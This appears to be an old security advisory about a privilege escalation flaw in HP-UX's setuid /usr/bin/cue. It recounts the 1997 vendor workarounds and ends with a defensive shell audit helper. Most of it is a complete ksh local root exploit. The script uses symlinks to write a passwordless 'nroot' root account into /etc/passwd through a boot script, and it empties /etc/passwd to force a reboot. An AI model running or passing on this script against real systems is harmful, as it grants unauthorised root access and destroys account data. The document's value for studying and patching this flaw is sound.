COMMAND

    cue

SYSTEMS AFFECTED

    HPUX / 800 models

PROBLEM

    Emilie Chang posted the following. One of the major problems we see
    with admins/security nowadays is that admins don't secure their
    hosts: they install patches... which is slightly different.

    It reminds us of this (very) old advisory which was issued by HP in
    1997 (!!!) about /usr/bin/cue. In the "Workarounds/Solution" section,
    the advice was to:

        # chmod 400 /usr/bin/cue

    or

        # chgrp trusted /usr/bin/cue
        # chmod 4750 /usr/bin/cue

    ...but admins just don't read advisories. They patch... and there
    was no patch for cue. This explains why most big HPUX servers are
    still vulnerable.

    Let's remember the "Scriptors of  Doom" days!  Local root  exploit
    below.

    #!/usr/bin/ksh
    
    ##
    ## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
    ##
    ## This is just a proof of concept. Don't use for malicious
    ## purpose. If ever you decide to run that script, please
    ## read the code carefully before!
    ##
    ## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
    ## people. Good job sweethearts.
    ##
    ## Old-styled exploit, tested on HPUX 10.20, model 899
    ## Warning : /usr/bin/cue exists on HPUX 800 models only
    ##
    ## Let's test the model by the way...
    ##
    
    MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
    export MODEL
    
    if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
    then
         echo "Your host doesn't look like a HPuX 8** model, stopping now."
         exit
    fi
    
    ##
    ## Test whether /usr/bin/cue exists or not...
    ##
    
    if [ ! -u /usr/bin/cue ]
    then
         echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
         exit
    fi
    
    ##
    ## Well you passed the above tests. Going on playing.
    ## Creating a file within /etc/rc.config.d : It will
    ## be executed at next reboot (which might happen
    ## soon)
    ##
    
    TTY=`tty | awk -F '/' '{print $3}'`
    export TTY
    
    TERM=whatevah
    export TERM
    
    umask 000
    ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
    /usr/bin/cue > /dev/null 2> /dev/null
    
    ##
    ## Inserting evil root account within /etc/passwd
    ##
    
    echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
    echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
    echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit
    
    ##
    ## Now saving the passwd file, which we are about to empty
    ##
    
    cp /etc/passwd /tmp/passwd
    
    ##
    ## passwd file destruction
    ## (SOMEONE SET US UP THE BOMB !!)
    ##
    
    rm IDMERROR.$TTY
    ln -s /etc/passwd IDMERROR.$TTY
    /usr/bin/cue > /dev/null 2> /dev/null
    
    ##
    ## *POOF*, now that the /etc/passwd file is emptied, admin
    ## MUST reboot to get things done.
    ##
    
    echo "Your nroot account will be created within /etc/passwd"
    echo "with no password. Remove it asap, it's just a proof"
    echo "of concept!"
    
    # The end.

SOLUTION

    Remove cue from the system.
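    To verify that a host has actually applied either the 1997 workaround
    (chmod 400, or chgrp trusted plus chmod 4750) or the removal advised
    above, here is an added POSIX sh audit helper; it is not part of the
    original post. It assumes only the binary's path, parses ls -ld so it
    runs on HP-UX as well as current systems, and reports the owning group
    for manual comparison because the name of the site's restricted group
    ("trusted" in the advisory) is an assumption it does not check.

```shell
#!/bin/sh
# Added audit helper (not from the original post): classifies a binary's
# permission bits against the states the 1997 HP advisory recommends for
# /usr/bin/cue. Only ls -ld is used, so no GNU stat is required.

# Print one of: absent, safe, restricted, world-exec-setuid
cue_status() {
    path=$1
    [ -e "$path" ] || { echo absent; return 0; }
    # ls -ld prints e.g. "-r-sr-xr-x 1 root bin ..."; keep the 10-char mode field
    mode=$(ls -ld "$path" | cut -c1-10)
    owner_x=$(echo "$mode" | cut -c4)     # 's' or 'S' here means the setuid bit is set
    other=$(echo "$mode" | cut -c8-10)    # rwx bits for everyone else
    case "$owner_x" in
        s|S) setuid=1 ;;
        *)   setuid=0 ;;
    esac
    if [ "$setuid" -eq 0 ]; then
        echo safe                # no setuid bit, nothing to escalate (chmod 400)
    elif [ "$other" = "---" ]; then
        echo restricted          # setuid, but only owner and group may run it (chmod 4750)
    else
        echo world-exec-setuid   # any local user can run a setuid-root binary
    fi
}

# Print the owning group, to compare by eye with the advisory's "chgrp trusted"
cue_group() {
    ls -ld "$1" | awk '{print $4}'
}

# Audit the real binary; on hosts without cue this simply reports "absent"
printf '%s: %s\n' /usr/bin/cue "$(cue_status /usr/bin/cue)"
```

    A "restricted" result is only as good as the membership of the group
    shown by cue_group, so review that group as well.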